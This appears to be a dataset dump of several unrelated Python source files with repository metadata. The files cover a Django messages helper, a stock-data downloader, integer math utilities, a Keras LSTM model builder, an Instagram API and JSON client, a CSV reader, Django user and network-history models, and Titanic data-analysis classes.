|
paiuolo/django-sso-app
|
75b96c669dc0b176dc77e08f018a3e97d259f636
|
[
"MIT"
] | 1
|
2021-11-16T15:16:08.000Z
|
2021-11-16T15:16:08.000Z
|
django_sso_app/core/api/utils.py
|
paiuolo/django-sso-app
|
75b96c669dc0b176dc77e08f018a3e97d259f636
|
[
"MIT"
] | null | null | null |
django_sso_app/core/api/utils.py
|
paiuolo/django-sso-app
|
75b96c669dc0b176dc77e08f018a3e97d259f636
|
[
"MIT"
] | null | null | null |
import logging
from django.contrib.messages import get_messages
from django.utils.encoding import force_str
logger = logging.getLogger('django_sso_app')
def get_request_messages_string(request):
"""
Serializes django messages
:param request:
:return:
"""
storage = get_messages(request)
_messages = []
for message in storage:
_messages.append(force_str(message))
return ', '.join(_messages)
| 20.045455
| 48
| 0.709751
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 96
| 0.217687
|
3bbcc2fb4051ff428b3a3b66b12c0e4e0235c79c
| 1,092
|
py
|
Python
|
download_stock_data.py
|
dabideee13/Price-Pattern-Prediction
|
632d961fc08777adab8eeb7ecbf16ac7cc71a3a7
|
[
"MIT"
] | null | null | null |
download_stock_data.py
|
dabideee13/Price-Pattern-Prediction
|
632d961fc08777adab8eeb7ecbf16ac7cc71a3a7
|
[
"MIT"
] | null | null | null |
download_stock_data.py
|
dabideee13/Price-Pattern-Prediction
|
632d961fc08777adab8eeb7ecbf16ac7cc71a3a7
|
[
"MIT"
] | null | null | null |
#!/opt/anaconda3/bin/python
# -*- coding: utf-8 -*-
"""
Get Stock Data
"""
import time
import pandas as pd
import yfinance as yf
if __name__ == '__main__':
# Path to file
# TODO: make directory if directory doesn't exist
f_file = "/Users/d.e.magno/Datasets/raw_stocks_new.csv"
# TODO: need to check which is already downloaded
stock_file = pd.read_csv('/Users/d.e.magno/Datasets/tickers/generic.csv')
stock_list = stock_file.Ticker
start_timeA = time.time()
for stock in stock_list:
try:
start_timeB = time.time()
print("Downloading {}...".format(stock))
yf.Ticker(stock).history(period="max").to_csv(
f_file.format(stock))
time.sleep(10)
end_timeB = time.time()
print("Time elapsed:", end_timeB - start_timeB)
print()
except Exception as ex:
pass
except KeyboardInterrupt as ex:
break
print("Finished.")
end_timeA = time.time()
print("Total time elapsed:", end_timeA - start_timeA)
| 24.266667
| 77
| 0.598901
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 358
| 0.327839
|
3bbd5cc24a379d3da78746ccf10468524d2749f7
| 2,421
|
py
|
Python
|
_int_tools.py
|
CaptainSora/Python-Project-Euler
|
056400f434eec837ece5ef06653b310ebfcc3d4e
|
[
"MIT"
] | null | null | null |
_int_tools.py
|
CaptainSora/Python-Project-Euler
|
056400f434eec837ece5ef06653b310ebfcc3d4e
|
[
"MIT"
] | null | null | null |
_int_tools.py
|
CaptainSora/Python-Project-Euler
|
056400f434eec837ece5ef06653b310ebfcc3d4e
|
[
"MIT"
] | null | null | null |
"""
This module contains functions related to integer formatting and math.
"""
from functools import reduce
from itertools import count
from math import gcd, prod
# ================ ARRAY FORMATTING FUNCTIONS ================
def str_array_to_int(intarray):
return int(''.join(intarray))
def int_array_to_int(intarray):
return str_array_to_int(map(str, intarray))
def int_to_int_array(num):
"""
Deprecated, use int_to_digit_array(num)
"""
return [int(str(num)[a]) for a in range(len(str(num)))]
def int_to_str_array(num):
return [str(num)[a] for a in range(len(str(num)))]
def int_to_digit_array(num):
return [int(str(num)[a]) for a in range(len(str(num)))]
# ================ CALCULATION FUNCTIONS ================
def product(numlist):
"""
Deprecated since Python 3.8, use math.prod instead
Also remove functools.reduce
"""
return reduce(lambda x, y: x * y, numlist, 1)
def factorial(num):
return prod(list(range(1, num + 1)))
def nCr(n, r):
return int(prod(range(n-r+1, n+1)) / prod(range(1, r+1)))
def phi(n):
"""
Returns the value of ϕ(n), or the Euler Totient function.
"""
return len([x for x in range(1, n) if gcd(n, x) == 1])
# ================ COUNTING FUNCTIONS ================
def counting_summations(values, target):
"""
Returns the number of ways to write target as the sum of numbers in values.
"""
csums = [[0 for _ in values]]
while len(csums) <= target:
tempsum = [0 for _ in values]
for a in range(len(values)):
if values[a] > len(csums):
break
elif values[a] == len(csums):
tempsum[a] = 1
else:
tempsum[a] += sum(csums[len(csums) - values[a]][:a+1])
csums.append(tempsum)
return sum(csums[target])
def partition():
"""
Calculates the partition function using Euler's method.
Much faster than the above function.
"""
yield 1
p = [1]
for i in count(1):
new_p = 0
for j in count(1):
# move i
if j % 2 == 0:
i -= j // 2
else:
i -= j
if i < 0:
break
# add to new_p
if (j - 1) % 4 < 2:
new_p += p[i]
else:
new_p -= p[i]
p.append(new_p)
yield new_p
| 23.278846
| 79
| 0.534077
| 0
| 0
| 567
| 0.234104
| 0
| 0
| 0
| 0
| 706
| 0.291495
|
3bbf01d5cb0102d02a8a8a3dba1f25da4c1520b3
| 2,260
|
py
|
Python
|
source/stats/lstm_model_builder.py
|
dangtunguyen/nids
|
a92b56a5ac29cc1482ae29374eef02bb7654785f
|
[
"MIT"
] | 2
|
2019-11-22T19:56:50.000Z
|
2020-12-15T02:43:52.000Z
|
source/stats/lstm_model_builder.py
|
dangtunguyen/nids
|
a92b56a5ac29cc1482ae29374eef02bb7654785f
|
[
"MIT"
] | null | null | null |
source/stats/lstm_model_builder.py
|
dangtunguyen/nids
|
a92b56a5ac29cc1482ae29374eef02bb7654785f
|
[
"MIT"
] | 2
|
2020-12-15T02:43:54.000Z
|
2021-11-05T03:19:59.000Z
|
#!/usr/bin/env python
from keras.models import Sequential
from keras.layers import Dense, Activation, Dropout, TimeDistributed, Flatten
from keras.layers import LSTM
'''
Reference: https://keras.io/getting-started/sequential-model-guide/
A stateful recurrent model is one for which the internal states (memories)
obtained after processing a batch of samples are reused as initial states
for the samples of the next batch. This allows to process longer sequences
while keeping computational complexity manageable.
'''
class LstmModelBuilder:
def __init__(self, batch_size, timesteps, data_dim, stateful, epochs, hidden_size, model_save_path):
self.batch_size = batch_size
self.timesteps = timesteps ## These are the past observations for a feature, such as lag variables
self.data_dim = data_dim ## These are columns in your data
self.stateful = stateful
self.epochs = epochs
self.hidden_size = hidden_size
self.model_save_path = model_save_path # Path where trained model will be saved
self.model = Sequential()
self.create_model()
def create_model(self):
## batch_input_shape: (batch_size, timesteps, data_dim)
self.model.add(LSTM(self.hidden_size, return_sequences=True, batch_input_shape=(self.batch_size, self.timesteps, self.data_dim), stateful=self.stateful))
self.model.add(LSTM(self.hidden_size, return_sequences=True, stateful=self.stateful))
self.model.add(LSTM(self.hidden_size, return_sequences=True, stateful=self.stateful))
self.model.add(Dropout(0.5))
#self.model.add(Flatten())
#self.model.add(Dense(1, activation='sigmoid'))
self.model.add(TimeDistributed(Dense(1))) # output_dim=1
self.model.add(Activation('sigmoid'))
self.model.compile(loss='binary_crossentropy', optimizer='adam', metrics=['accuracy'])
print(self.model.summary())
## trainX: input data
## trainY: output label
def train(self, trainX, trainY):
history = self.model.fit(trainX, trainY, epochs=self.epochs, batch_size=self.batch_size, verbose=0, shuffle=False)
print(history.history)
def save(self):
self.model.save(self.model_save_path)
| 48.085106
| 161
| 0.712389
| 1,737
| 0.768584
| 0
| 0
| 0
| 0
| 0
| 0
| 750
| 0.331858
|
3bc0be85bb851d619749be911d22c015dc81cc08
| 26,696
|
py
|
Python
|
pyinstagram/base.py
|
alessandrocucci/PyInstagram
|
cd8f30b8c470a8cdcd8da801af897e4d14f7a677
|
[
"MIT"
] | 1
|
2019-05-03T17:46:02.000Z
|
2019-05-03T17:46:02.000Z
|
pyinstagram/base.py
|
alessandrocucci/PyInstagram
|
cd8f30b8c470a8cdcd8da801af897e4d14f7a677
|
[
"MIT"
] | 1
|
2021-06-01T21:51:23.000Z
|
2021-06-01T21:51:23.000Z
|
pyinstagram/base.py
|
alessandrocucci/PyInstagram
|
cd8f30b8c470a8cdcd8da801af897e4d14f7a677
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
import random
from datetime import datetime
from operator import itemgetter
import requests
import time
from pyinstagram.model import Media
from .exceptions import OAuthException, PyInstagramException
from .oauth import OAuth
from .constants import API_URL
from .utils import DESAdapter
class InstagramApiClient(object):
"""
Classe base per le chiamate all'API ufficiale!
"""
def __init__(self, access_token=None):
self.access_token = access_token
if isinstance(access_token, OAuth):
self.access_token = access_token.access_token
if not self.access_token:
# TODO: Gestire il caso in cui l'access token scada
raise OAuthException("Per usare la libreria devi prima autenticarti!")
@staticmethod
def go_to_sleep(seconds=3600):
"""
Questo metodo viene chiamato quando è stato raggiunto il
limite consentito dall'API, se succede metto in pausa il
programma per un'ora.
:param seconds: int - Numero di secondi di attesa
:return: None
"""
time.sleep(seconds)
def _make_request(self, uri, method='get', data=None):
"""
Metodo che effettua la richiesta alle API Instagram.
:param uri: str - L'Uri da chiamare
:param method: str - metodo http con cui fare la richiesta
:param data: dict - dizionario con i dati da passare nella richiesta
:return: list - lista di dati di risposta
"""
next_url = "" # per la paginazione
res = []
retry = 1 # serve per ripetere la chiamata dopo un ora se supero il limite di richieste
while retry:
res = getattr(requests, method)(uri, data=data)
res, next_url = self._handle_response(res)
if res == 0:
# la chiamata non è andata a buon fine perchè ho raggiunto il limite di chiamate
# ho già aspettato un'ora, adesso ci riprovo.
continue
retry = 0
return res, next_url
def _handle_response(self, request):
"""
Una volta effettuata la chiamata, ci occupiamo di
interpretarne la risposta.
Se la richiesta è andata a buon fine, restituiamo la
lista dei dati, altrimenti o mettiamo in pausa il
programma (se abbiamo raggiunto il limite dell'API)
o solleviamo un'eccezione appropriata.
:param request: requests - la risposta della chiamata
:return: list - lista dei dati ricevuti
"""
if request.status_code == 200:
# Tutto ok!
try:
res = request.json()
except Exception:
raise Exception(request.text)
else:
data = res['data']
next_url = res.get('pagination', {}).get('next_url')
return data, next_url
elif request.status_code == 429:
# OAuthRateLimitException
self.go_to_sleep()
return 0
elif request.status_code == 400:
raise OAuthException(request.json()['meta']['error_message'])
elif "<!DOCTYPE html>" in request.text:
raise PyInstagramException("Page not found")
else:
raise PyInstagramException
def get_by_user(self, id_user=None, count=0):
"""
Metodo usato per cercare gli ultimi post di un utente.
Se non viene passato il paramentro id_user, chiederemo
i post dell'utente che ha autorizzato l'app.
:param id_user: str - post dell'utente da cercare
:param count: int - limita a {count} risultati
:return: list - lista dati
"""
all_media = []
id_user = id_user or "self"
url = API_URL + "users/{0}/media/recent/?access_token={1}".format(id_user, self.access_token)
if count:
url += "&count={}".format(count)
raw_list, next_url = self._make_request(url)
all_media.extend(raw_list)
if len(all_media) > count:
return all_media[:count]
while next_url:
raw_list, next_url = self._make_request(next_url)
all_media.extend(raw_list)
return all_media[:count]
def get_by_hashtag(self, tags=(), count=0):
"""
Metodo usato per cercare i post con uno o più hashtag.
:param tags: iterable - gli hashtag da cercare
:param count: int - massimo numero di risultati da restituire
:return: list - lista di dati
"""
if isinstance(tags, str):
tags = (tags, )
all_media = []
for tag in tags:
url = API_URL + "tags/{0}/media/recent?access_token={1}".format(tag, self.access_token)
if count:
url += "&count={}".format(count)
raw_list, next_url = self._make_request(url)
all_media.extend(raw_list)
while next_url:
raw_list, next_url = self._make_request(next_url)
all_media.extend(raw_list)
return all_media
def search_for_tag(self, tag, count=3):
"""
Metodo usato per cercare hashtag simili a un altro.
:param tag: str - hashtag da cercare
:param count: int - limita a un numero di hashtag
:return: dict
"""
url = API_URL + "tags/search?q={0}&access_token={1}".format(tag, self.access_token)
res, _ = self._make_request(url)
res = sorted(res, key=itemgetter('media_count'))
names = {r['name']: r['media_count'] for r in res[:count]}
return names
class InstagramJsonClient(object):
"""
Classe per fare semplici richieste in get senza usare access token
o le API ufficiali. Fa largo uso di url con query string.
"""
def __init__(self):
self.base_url = "https://www.instagram.com/"
self.session = self._init_session()
def _init_session(self):
"""Abilita il supporto 3DES su Instagram"""
s = requests.Session()
s.mount(self.base_url, DESAdapter())
return s
def get_user_info(self, user):
"""
Ritorna le informazioni di un utente
:param user: username Instagram
:return: dizionario con le info dell'utente
"""
base_url = "{base}{user}/?__a=1".format(
base=self.base_url,
user=user
)
res = self.session.get(base_url)
try:
res = res.json()
except Exception:
raise PyInstagramException("Impossibile scaricare i dati dall'indirizzo: {}".format(base_url))
return res.get('user', {})
def get_by_user(self, user, count=None, since=None, until=None):
"""
Ricerca post (pubblici) di un utente.
Gestisce automaticamente la paginazione.
Ritorna una lista di dizionari così composta:
[
{
id: "1606977067425770236_528817151",
code: "BZNISDyHKr8",
user: {
id: "528817151",
full_name: "NASA",
profile_picture: "https://scontent-mxp1-1.cdninstagram.com/t51.2885-19/11375151_392132304319140_1291663475_a.jpg",
username: "nasa"
},
images: {
thumbnail: {
width: 150,
height: 150,
url: "https://scontent-mxp1-1.cdninstagram.com/t51.2885-15/s150x150/e15/21690201_1801206810171539_7249344908006260736_n.jpg"
},
low_resolution: {
width: 320,
height: 320,
url: "https://scontent-mxp1-1.cdninstagram.com/t51.2885-15/s320x320/e15/21690201_1801206810171539_7249344908006260736_n.jpg"
},
standard_resolution: {
width: 640,
height: 640,
url: "https://scontent-mxp1-1.cdninstagram.com/t51.2885-15/s640x640/e15/21690201_1801206810171539_7249344908006260736_n.jpg"
}
},
created_time: "1505786616",
caption: {
id: "17887172635109592",
text: "Look up in the sky tonight and see Saturn! This month Saturn is the only prominent evening planet low in the southwest sky. Look for it near the constellation Sagittarius. Above and below Saturn--from a dark sky--you can't miss the summer Milky Way spanning the sky from northeast to southwest! Grab a pair of binoculars and scan the teapot-shaped Sagittarius, where stars and some brighter clumps appear as steam from the teapot. Those bright clumps are near the center of our galaxy, which is full of gas, dust and stars. Credit: NASA #nasa #space #astronomy #september #whatsup #night #nightsky #stars #stargazing #saturn #planet",
created_time: "1505786616",
from: {
id: "528817151",
full_name: "NASA",
profile_picture: "https://scontent-mxp1-1.cdninstagram.com/t51.2885-19/11375151_392132304319140_1291663475_a.jpg",
username: "nasa"
}
},
user_has_liked: false,
likes: {
data: [
{
id: "4010977557",
full_name: "Natalia",
profile_picture: "https://scontent-mxp1-1.cdninstagram.com/t51.2885-19/s150x150/14482183_140565769737733_5249004653428867072_a.jpg",
username: "nata.barata"
},
{
id: "2055640911",
full_name: "S@brin@ Lec○cq ♡☆♡",
profile_picture: "https://scontent-mxp1-1.cdninstagram.com/t51.2885-19/s150x150/13534211_1557747037863158_1773299287_a.jpg",
username: "melsab19"
},
{
id: "752521983",
full_name: "Laura Álvarez Peláez",
profile_picture: "https://scontent-mxp1-1.cdninstagram.com/t51.2885-19/10624147_809215025765686_985825156_a.jpg",
username: "lauriwushu"
},
{
id: "1719376530",
full_name: "Julia Paniti",
profile_picture: "https://scontent-mxp1-1.cdninstagram.com/t51.2885-19/10985984_1575721159312127_239135761_a.jpg",
username: "julia_paniti"
}
],
count: 204038
},
comments: {
data: [
{
id: "17876620534138631",
text: "@jennytried ❤️",
created_time: "1505855823",
from: {
id: "4610349",
full_name: "",
profile_picture: "https://scontent-mxp1-1.cdninstagram.com/t51.2885-19/10932285_747424172021124_1089839988_a.jpg",
username: "siskascherz"
}
},
{
id: "17899664473040297",
text: "@a.hm.ed.1",
created_time: "1505855825",
from: {
id: "416900232",
full_name: "Maryem BenKh",
profile_picture: "https://scontent-mxp1-1.cdninstagram.com/t51.2885-19/s150x150/16907969_415736022127336_8841431139366207488_a.jpg",
username: "maariam_bk"
}
},
{
id: "17871962107174729",
text: "Wonderful 😍",
created_time: "1505855872",
from: {
id: "2982243595",
full_name: "Smit Raj",
profile_picture: "https://scontent-mxp1-1.cdninstagram.com/t51.2885-19/s150x150/21690360_117321958944805_772082897589895168_n.jpg",
username: "smit_raj_"
}
}
],
count: 1564
},
can_view_comments: true,
can_delete_comments: false,
type: "video",
link: "https://www.instagram.com/p/BZNISDyHKr8/",
location: null,
alt_media_url: "https://scontent-mxp1-1.cdninstagram.com/t50.2886-16/21904634_340030459792492_153261372472295424_n.mp4",
videos: {
standard_resolution: {
width: 640,
height: 640,
url: "https://scontent-mxp1-1.cdninstagram.com/t50.2886-16/21904634_340030459792492_153261372472295424_n.mp4"
},
low_bandwidth: {
width: 480,
height: 480,
url: "https://scontent-mxp1-1.cdninstagram.com/t50.2886-16/21868687_149708205622876_4737472794344816640_n.mp4"
},
low_resolution: {
width: 480,
height: 480,
url: "https://scontent-mxp1-1.cdninstagram.com/t50.2886-16/21868687_149708205622876_4737472794344816640_n.mp4"
}
},
video_views: 1012473
},
]
:param user: str - username Instagram
:param count: int - limita il numero di risultati
:param since: str - Risultati a partire da questa data, es. "20170101000000"
:param until: str - Risultati entro questa data, es. "20171231235959"
:return:
"""
if since:
try:
since = datetime.strptime(since, "%Y%m%d%H%M%S")
except ValueError:
raise ValueError("Il parametro since non è in un formato corretto (es. '20170101000000')")
if until:
try:
until = datetime.strptime(until, "%Y%m%d%H%M%S")
except ValueError:
raise ValueError("Il parametro until non è in un formato corretto (es. '20170101000000')")
all_data = []
base_url = "{base}{user}?__a=1{{max}}".format(
base=self.base_url,
user=user
)
max_id = ""
next_url = base_url.format(max=max_id)
while True:
res = self.session.get(next_url)
if not res.status_code == 200:
return all_data[:count]
try:
res = res.json()
except Exception:
raise PyInstagramException("Impossibile scaricare i dati dall'indirizzo: {}".format(next_url))
for media_res in res['user']['media']['nodes']:
# Instagram non mi permette di cercare per data, però mi fornisce la
# data di creazione del post in formato Unix Timestamp. Quindi, per
# gestire il caso in cui volessi solo risultati in un certo intervallo,
# verifico che il mio post sia stato creato in questo lasso di tempo.
created_at = int(media_res['date'])
if since and created_at < time.mktime(since.timetuple()):
# sono andato troppo indietro, posso uscire
return all_data[:count]
if until and created_at > time.mktime(until.timetuple()):
continue
all_data.append(media_res)
if res['user']['media']['nodes'] and (not len(all_data) > count if count else True):
# ho oggetti, ne ho altri da scaricare, e non ho raggiunto il limite di risultati
try:
max_id = res['user']['media']['nodes'][-1]['id']
next_url = base_url.format(max="&max_id={}".format(max_id))
except IndexError:
# aspetto un po', index è vuoto e Instagram mi blocca il flusso
time.sleep(random.randint(10, 60))
else:
# tutto ok, ho altri dati da scaricare
continue
else:
# non ho dati, oppure ne ho di più di quelli voluti
break
return all_data[:count]
def get_by_hashtag(self, tags=(), count=1000000, top_posts=True, since=None, until=None):
"""
Ricerca per hashtag.
Gestisce automaticamente la paginazione.
Ritorna una lista di oggetti SqlAlchemy a partire da
una lista di dizionari fatti come segue:
[
{
comments_disabled: false,
id: "1607551655901147333",
dimensions: {
height: 640,
width: 640
},
owner: {
id: "981246989"
},
thumbnail_src: "https://scontent-mxp1-1.cdninstagram.com/t51.2885-15/e35/21820166_125621088095492_8628217971971457024_n.jpg",
thumbnail_resources: [
{
src: "https://scontent-mxp1-1.cdninstagram.com/t51.2885-15/s150x150/e35/21820166_125621088095492_8628217971971457024_n.jpg",
config_width: 150,
config_height: 150
},
{
src: "https://scontent-mxp1-1.cdninstagram.com/t51.2885-15/s240x240/e35/21820166_125621088095492_8628217971971457024_n.jpg",
config_width: 240,
config_height: 240
},
{
src: "https://scontent-mxp1-1.cdninstagram.com/t51.2885-15/s320x320/e35/21820166_125621088095492_8628217971971457024_n.jpg",
config_width: 320,
config_height: 320
},
{
src: "https://scontent-mxp1-1.cdninstagram.com/t51.2885-15/s480x480/e35/21820166_125621088095492_8628217971971457024_n.jpg",
config_width: 480,
config_height: 480
}
],
is_video: false,
code: "BZPK7bAFDDF",
date: 1505855112,
display_src: "https://scontent-mxp1-1.cdninstagram.com/t51.2885-15/e35/21820166_125621088095492_8628217971971457024_n.jpg",
caption: "Tommy Hilfiger London Fashion Week Spring_Summer 2018 @londonfashionweek @britishfashioncouncil @tommyhilfiger #londonfashionweek#LFW#fashion#paris#fashionblogger#tehran#fashioneditor#fashionweek#style#streetstyle##milan#london#newyork#mfw#lfw#nyfw#vogue#gq#art#love#fashionshow#blogger#life#event#ss2018#instafashion#runway#fashionmoment0#TOMMYNOW",
comments: {
count: 1
},
likes: {
count: 24
}
},
]
:param tags: str or tuple - hashtag (senza il #) o tupla di hastag
:param count: int - limita i risultati
:param top_posts: bool - limita ai top posts altrimenti ritorna tutto
:param since: str - Risultati a partire da questa data, es. "20170101000000"
:param until: str - Risultati entro questa data, es. "20171231235959"
:return: list - lista di dizionari
"""
if isinstance(tags, str):
tags = (tags, )
if since:
try:
since = datetime.strptime(since, "%Y%m%d%H%M%S")
except ValueError:
raise ValueError("Il parametro since non è in un formato corretto (es. '20170101000000')")
if until:
try:
until = datetime.strptime(until, "%Y%m%d%H%M%S")
except ValueError:
raise ValueError("Il parametro until non è in un formato corretto (es. '20170101000000')")
mapper = {
'id': 'id',
'comments': 'edge_media_to_comment.count',
'unix_datetime': 'taken_at_timestamp',
'user': 'owner.id',
'likes': 'edge_liked_by.count',
'is_video': 'is_video',
'url': 'display_src',
'height': 'dimensions.height',
'width': 'dimensions.width',
'code': 'shortcode'
}
all_data = []
for tag in tags:
all_data_tag = []
base_url = "{base}explore/tags/{tag}?__a=1{{max}}".format(
base=self.base_url,
tag=tag
)
max_id = ""
next_url = base_url.format(max=max_id)
while True:
res = self.session.get(next_url)
try:
res = res.json()
except Exception:
if "Sorry, this page isn't available" in res.text:
# Post rimosso o non più raggiungibile
continue
else:
raise PyInstagramException("Impossibile scaricare i dati dall'indirizzo: {}".format(next_url))
res_media = res['graphql']['hashtag']['edge_hashtag_to_top_posts'] if top_posts else res['graphql']['hashtag']['edge_hashtag_to_media']
has_next_page = res['graphql']['hashtag']['edge_hashtag_to_media']['page_info']['has_next_page']
# converto in oggetti SqlAlchemy
sqlalchemy_media = []
for element in res_media['edges']:
# Instagram non mi permette di cercare per data, però mi fornisce la
# data di creazione del post in formato Unix Timestamp. Quindi, per
# gestire il caso in cui volessi solo risultati in un certo intervallo,
# verifico che il mio post sia stato creato in questo lasso di tempo.
created_at = int(element['node']['taken_at_timestamp'])
if since and created_at < time.mktime(since.timetuple()):
# sono andato troppo indietro, posso uscire
break
if until and created_at > time.mktime(until.timetuple()):
continue
model = Media()
for field_to, getter in mapper.items():
path = getter.split('.')
val = element['node']
for key in path:
val = val.get(key, {})
if isinstance(val, dict):
val = None
setattr(model, field_to, val)
model.json = element['node']
model.caption = element['node']['edge_media_to_caption']['edges'][0]['node']['text']
sqlalchemy_media.append(model)
all_data_tag.extend(sqlalchemy_media)
if res_media['edges'] and has_next_page and not len(all_data_tag) > count and not top_posts:
try:
max_id = res['graphql']['hashtag']['edge_hashtag_to_media']['page_info']['end_cursor']
next_url = base_url.format(max="&max_id={}".format(max_id))
except IndexError:
# aspetto un po', index è vuoto e Instagram mi blocca il flusso
time.sleep(random.randint(10, 60))
else:
# tutto ok, ho altri dati da scaricare
continue
else:
# non ho dati, oppure ne ho di più di quelli voluti
break
all_data.extend(all_data_tag)
return all_data[:count]
def get_by_media_codes(self, codes=(), all_comments=False):
"""
Restituisce una lista contenente i dati dei post richiesti
(identificati dalla stringa 'code' del post). Attivando
il flag all_comments, verranno fatte ulteriori richieste
gestendo la paginazione dei commenti. I commenti verranno
aggiunti al json originale in modo da avere alla fina una
lista composta da tanti elementi quanti sono i post
richiesti.
:param codes: stringa del codice o tupla con i codici dei post
:param all_comments: bool - se attivato, scarica tutti i commenti
:return: lista di json con i dati dei post richiesti
"""
if isinstance(codes, str):
codes = (codes,)
all_data = []
for code in codes:
url = "{base}p/{code}?__a=1".format(
base=self.base_url,
code=code
)
res = self.session.get(url)
try:
res = res.json()
except Exception:
if "Sorry, this page isn't available" in res.text:
# Post rimosso o non più raggiungibile
continue
else:
raise PyInstagramException("Impossibile scaricare i dati dall'indirizzo: {}".format(url))
if all_comments:
while True:
page_info = res['graphql']['shortcode_media']['edge_media_to_comment']['page_info']
if page_info['has_next_page']:
next_url = url + "&max_id={}".format(page_info['end_cursor'])
next_res = self.session.get(next_url)
next_res = next_res.json()
res_edges = res['graphql']['shortcode_media']['edge_media_to_comment']['edges']
next_edges = next_res['graphql']['shortcode_media']['edge_media_to_comment']['edges']
res_edges.extend(next_edges)
else:
break
all_data.append(res)
return all_data
| 44.271973
| 661
| 0.523599
| 26,411
| 0.987992
| 0
| 0
| 342
| 0.012794
| 0
| 0
| 16,960
| 0.634446
|
3bc1971c02e3a51d7591b4d8543cd3bec3e278e6
| 1,483
|
py
|
Python
|
csv_readers/stay_points_csv_reader.py
|
s0lver/stm-creator
|
b058185ca028abd1902edbb35a52d3565b06f8b0
|
[
"Apache-2.0"
] | null | null | null |
csv_readers/stay_points_csv_reader.py
|
s0lver/stm-creator
|
b058185ca028abd1902edbb35a52d3565b06f8b0
|
[
"Apache-2.0"
] | null | null | null |
csv_readers/stay_points_csv_reader.py
|
s0lver/stm-creator
|
b058185ca028abd1902edbb35a52d3565b06f8b0
|
[
"Apache-2.0"
] | null | null | null |
import csv
from typing import List, Iterator, Dict
from entities.StayPoint import StayPoint
def read(file_path: str) -> List[StayPoint]:
"""
Returns a list of StayPoint read from the specified file path
:param file_path: The path of file to read
:return: A list of StayPoint
"""
file = open(file_path, 'r', newline='', encoding='utf-8')
results = []
reader = csv.DictReader(file, delimiter=',')
for line in reader:
stay_point = build_stay_point_from_line(line)
results.append(stay_point)
return results
def read_line_by_line(file_path: str) -> Iterator[StayPoint]:
"""
Reads a csv file of stay points line by line
:param file_path: The path of file to read
:return: A StayPoint object usable in for each call
"""
file = open(file_path, 'r', newline='', encoding='utf-8')
reader = csv.DictReader(file, delimiter=',')
for line in reader:
current_stay_point = build_stay_point_from_line(line)
yield current_stay_point
def build_stay_point_from_line(line: Dict) -> StayPoint:
"""
Builds a StayPoint object parsing the specified line
:param line: The line to parse
:return: A StayPoint object
"""
id_stay_point = int(line["_id"])
latitude = float(line["latitude"])
longitude = float(line["longitude"])
visit_count = int(line["visitCount"])
stay_point = StayPoint(id_stay_point, latitude, longitude, visit_count)
return stay_point
| 29.66
| 75
| 0.681052
| 0
| 0
| 459
| 0.309508
| 0
| 0
| 0
| 0
| 523
| 0.352664
|
3bc47ccda883fce926fb879e2f171e425ac7191d
| 1,959
|
py
|
Python
|
login/models.py
|
zcw576020095/netsysyconfig_platform
|
d47be2c5b3418d59a226cb9e135972160e51df00
|
[
"Unlicense"
] | 1
|
2022-03-25T07:49:10.000Z
|
2022-03-25T07:49:10.000Z
|
login/models.py
|
zcw576020095/netsysyconfig_platform
|
d47be2c5b3418d59a226cb9e135972160e51df00
|
[
"Unlicense"
] | null | null | null |
login/models.py
|
zcw576020095/netsysyconfig_platform
|
d47be2c5b3418d59a226cb9e135972160e51df00
|
[
"Unlicense"
] | null | null | null |
from django.db import models
# Create your models here.
class User(models.Model):
gender = (
('male',"男"),
('female',"女")
)
name = models.CharField(max_length=128,unique=True)
password = models.CharField(max_length=256)
email = models.EmailField(unique=True)
sex = models.CharField(max_length=32, choices=gender,default="男")
create_time = models.DateTimeField(auto_now_add=True)
has_confirmed = models.BooleanField(default=False)
def __str__(self):
return self.name
class Meta:
ordering = ["-create_time"]
verbose_name = "用户"
verbose_name_plural = "用户"
class ConfirmString(models.Model):
code = models.CharField(max_length=256)
user = models.OneToOneField('User',on_delete=models.CASCADE)
create_time = models.DateTimeField(auto_now_add=True)
def __str__(self):
return self.user.name + ": " + self.code
class Meta:
ordering = ["-create_time"]
verbose_name = "确认码"
verbose_name_plural = "确认码"
## 断网记录
class ClickHistory(models.Model):
clicknet_areaname = models.CharField(max_length=128,verbose_name='断网区域')
clicknet_date = models.DateTimeField(max_length=64,verbose_name="断网时间")
def __str__(self):
return '{} {}'.format(self.clicknet_areaname,self.clicknet_date)
class Meta:
db_table = 'click_history'
ordering = ["-clicknet_date"]
verbose_name = "断网记录"
verbose_name_plural = "断网记录"
## 联网记录
class ConnectHistory(models.Model):
connectnet_areaname = models.CharField(max_length=128,verbose_name='联网区域')
connectnet_date = models.DateTimeField(max_length=64,verbose_name="联网时间")
def __str__(self):
return '{} {}'.format(self.connectnet_areaname,self.connectnet_date)
class Meta:
db_table = 'connect_history'
ordering = ["-connectnet_date"]
verbose_name = "联网记录"
verbose_name_plural = "联网记录"
| 27.591549
| 78
| 0.669219
| 1,966
| 0.952058
| 0
| 0
| 0
| 0
| 0
| 0
| 353
| 0.170944
|
3bc52fc59dc21473a03e193fd04c98996f1d2a1e
| 2,083
|
py
|
Python
|
DataAnalysis.py
|
andairka/Simple-default-Backpropagation-ANN
|
995de1471e2b132af721b2babbec034f29228640
|
[
"MIT"
] | null | null | null |
DataAnalysis.py
|
andairka/Simple-default-Backpropagation-ANN
|
995de1471e2b132af721b2babbec034f29228640
|
[
"MIT"
] | null | null | null |
DataAnalysis.py
|
andairka/Simple-default-Backpropagation-ANN
|
995de1471e2b132af721b2babbec034f29228640
|
[
"MIT"
] | null | null | null |
import ImportTitanicData
import DataPreparation
# analiza danych przed preparacją danych
class DataAnaliysisBefore():
def showTrain(self):
importData = ImportTitanicData.DataImport()
train = importData.importTrain()
return train
def shapeTrain(self):
return self.showTrain().shape
def dtypesTrain(self):
return self.showTrain().dtypes
def showTest(self):
importData = ImportTitanicData.DataImport()
test = importData.importTest()
return test
def shapeTest(self):
return self.showTest().shape
def dtypesTest(self):
return self.showTest().dtypes
# analiza danych po preparacji danych
class DataAnaliysisAfter():
def showTrain(self):
dataPreparation = DataPreparation.DataPreparation()
train = dataPreparation.prepareTrainData()
return train
def shapeTrain(self):
return self.showTrain().shape
def dtypesTrain(self):
return self.showTrain().dtypes
def showTest(self):
dataPreparation = DataPreparation.DataPreparation()
test = dataPreparation.prepareTestData()
return test
def shapeTest(self):
return self.showTest().shape
def dtypesTest(self):
return self.showTest().dtypes
#
#
# def showTest(self):
# test = ImportTitanicData.DataImport.importTest()
# return test.head()
# def showTest ()
# dataAnaysis = DataAnaliysisBefore()
dataAnaysis = DataAnaliysisAfter()
